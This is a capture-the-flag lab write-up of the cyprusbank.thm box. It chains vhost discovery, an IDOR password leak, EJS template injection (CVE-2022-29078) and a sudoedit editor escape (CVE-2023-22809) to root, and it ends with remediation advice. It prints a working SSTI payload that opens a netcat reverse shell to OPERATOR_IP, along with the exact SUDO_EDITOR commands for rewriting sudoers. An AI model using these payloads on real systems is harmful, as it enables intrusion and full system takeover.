IDOR to EJS SSTI and sudoedit editor escape
Foundations web engagement: vhost and low-priv login led to IDOR password disclosure; EJS CVE-2022-29078 yielded RCE as web; sudoedit with CVE-2023-22809-style editor injection rewrote sudoers for root.
- Case files
- IDOR to EJS SSTI and sudoedit editor escape
admin.cyprusbank.thm accepted Olivia’s credentials; IDOR leaked Gayle’s password. EJS SSTI opened a shell; sudoedit on an nginx site file with a crafted EDITOR planted full sudo.
ffuf found admin.cyprusbank.thm. Olivia’s session plus /messages/?c= leaked Gayle’s password.
Gayle’s settings POST injected outputFunctionName with child_process.execSync for a reverse shell.
SUDO_EDITOR pointed at /etc/sudoers; after editing, sudo su returned root.
Engagement summary
admin.cyprusbank.thm accepted Olivia’s credentials; IDOR leaked Gayle’s password. EJS SSTI opened a shell; sudoedit on an nginx site file with a crafted EDITOR planted full sudo.
WHITEROSE (10.10.200.189 / cyprusbank.thm) exposed nginx and an admin vhost. Provided credentials Olivia Cortez / olivi8 authenticated to the panel. messages/?c= accepted sequential IDs — c=10 disclosed Gayle Bev’s password. Gayle’s settings endpoint accepted a settings[view options][outputFunctionName] payload (CVE-2022-29078) that execSync’d a reverse shell as web. sudo -l allowed sudoedit on /etc/nginx/sites-available/admin.cyprusbank.thm; exporting SUDO_EDITOR to open /etc/sudoers (CVE-2023-22809 technique) let us grant web NOPASSWD ALL and sudo su to root.
Business impact
IDOR on messaging is credential theft. Unpatched EJS is RCE. sudoedit that honors attacker-controlled editor arguments is root. Fix object references, upgrade EJS past CVE-2022-29078, and patch sudo for CVE-2023-22809.
Vhost, login, and IDOR
ffuf found admin.cyprusbank.thm. Olivia’s session plus /messages/?c= leaked Gayle’s password.
OPERATOR · VHOST
savvy@lab:~$ echo '10.10.200.189 cyprusbank.thm admin.cyprusbank.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ ffuf -w subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host: FUZZ.cyprusbank.thm" -fw 1
admin
# login Olivia Cortez / olivi8 → messages/?c=10 → Gayle Bev password
EJS SSTI RCE (CVE-2022-29078)
Gayle’s settings POST injected outputFunctionName with child_process.execSync for a reverse shell.
PAYLOAD
name=a&password=a&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc OPERATOR_IP 1234 -e bash');sOPERATOR · SHELL
savvy@lab:~$ nc -lnvp 1234
savvy@lab:~/app$
savvy@lab:~$ id
uid=1000(web) gid=1000(web)
sudoedit editor escape to root
SUDO_EDITOR pointed at /etc/sudoers; after editing, sudo su returned root.
OPERATOR · SUDOEDIT
savvy@lab:~$ sudo -l
(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
savvy@lab:~$ export SUDO_EDITOR='nano -- /etc/sudoers'
savvy@lab:~$ sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
# add: web ALL=(root) NOPASSWD: ALL
savvy@lab:~$ sudo su
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Authorize message access by ownership, not sequential IDs. Upgrade EJS; reject nested settings injection. Patch sudo and avoid sudoedit on paths that interact with writable directories.